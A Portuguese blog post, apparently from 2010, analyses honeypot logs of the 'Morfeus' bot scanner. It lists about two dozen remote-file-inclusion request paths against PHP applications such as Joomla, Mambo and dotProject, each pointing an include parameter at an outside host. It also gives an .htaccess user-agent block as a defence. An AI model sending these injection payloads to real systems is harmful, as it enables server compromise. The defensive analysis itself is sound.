Hoje pela manhã (1/12/2010) fui analisar os logs do meu Honeypot – breve estarei postando um post sobre honeypot - e para a minha surpresa um novo scanear de vulnerabilidade esta rodando pelo mundo. Este novo scanear é chamado de “Morfeus Fucking Scanner”. Até onde pude verificar ele é um bot que busca por vulnerabilidades em códigos em PHP. Abaixo segue o log de outro servidor com honeypot:
/admin/business_inc/saveserver.php?thisdir=http://203.206.169.35/1.gif?/
/admin/business_inc/saveserver.php?thisdir=http://makina.org/sugarfree/1.gif?/
/board/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/board/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/cacti/include/config_settings.php?config[include_path]=http://makina.org/sugarfree/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/calendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
/cal/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/dotproject/includes/db_adodb.php?baseDir=http://makina.org/sugarfree/1.gif?/
/ical/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://makina.org/sugarfree/1.gif?/
/index.php?id=http://makina.org/sugarfree/1.gif?/
/index.php?option=com_custompages&cpage=http://203.206.169.35/1.gif?/
/joomla/components/com_facileforms/facileforms.frame.php?ff_compath=http://203.206.169.35/1.gif?/
/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.206.169.35/1.gif?/
//?mosConfig_absolute_path=http://203.206.169.35/1.gif?/
/project/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/projects/includes/db_adodb.php?baseDir=http://203.206.169.35/1.gif?/
/rgboard/include/bbs.lib.inc.php?site_path=http://203.206.169.35/1.gif?/
/user/soapCaller.bs
/webcalendar/tools/send_reminders.php?includedir=http://makina.org/sugarfree/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://203.206.169.35/1.gif?/
/webcalendar/tools/send_reminders.php?noSet=0&includedir=http://64.15.76.197/modules/1.gif?/
O arquivo 1.gif que o atacante inclui é um script em PHP fazendo um echo:
echo ("Morfeus hacked you");
Para quem usa Apache pode “bloquear” o Morfeus adicionando 3 linhas no arquivo .htaccess:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ – [F]
Quando o Apache analisar o Agente sendo como Morfeus ele barra a requisição. O problema é que se o desenvolvedor mudar o Agente para outro nome, o que é super fácil de fazer, o Morfeus burlara essa defesa no Apache.
by Osvaldo H Peixoto
Nenhum comentário:
Postar um comentário